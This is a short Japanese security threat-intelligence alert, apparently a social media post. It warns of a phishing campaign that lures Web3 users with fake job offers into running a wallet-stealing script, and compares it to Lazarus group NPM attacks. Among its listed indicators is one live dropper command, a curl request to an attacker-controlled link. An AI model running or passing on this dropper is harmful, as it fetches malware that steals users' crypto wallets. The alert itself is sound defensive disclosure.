🚨 セキュリティTIアラート 🚨

コミュニティパートナー @1nf0s3cptによると、Web3ユーザーを標的にしたフェイクジョブオファー（例：時給120ドル）を用いた、活動中のフィッシングキャンペーンが存在している。

このキャンペーンでは、悪意あるスクリプトを実行させることでウォレットファイルを盗み取ろうとしている。

🔍 主なIOCs：

🔸GitLabレポジトリ：https://t.co/ivGN93PS4b

🔸ドロッパー：curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 攻撃手法は、以前のLazarusグループがNPMパッケージを使って悪意あるコードを拡散した方法と非常に似ている：

https://t.co/bBC4i2vYpA

🚨 新たに悪意あるNPMパッケージが公開されたことが判明した：

https://t.co/SjgmO1FOIL

🔸おそらく関連するGitHub：apollo-hero

🔸アップロード者メール：skelstar125@gmail.com

⚠️ 知らないパッケージやスクリプトのインストールや実行をしてはいけません。常に信頼できるソースであることを確認してください。

#LAZARUS #フィッシング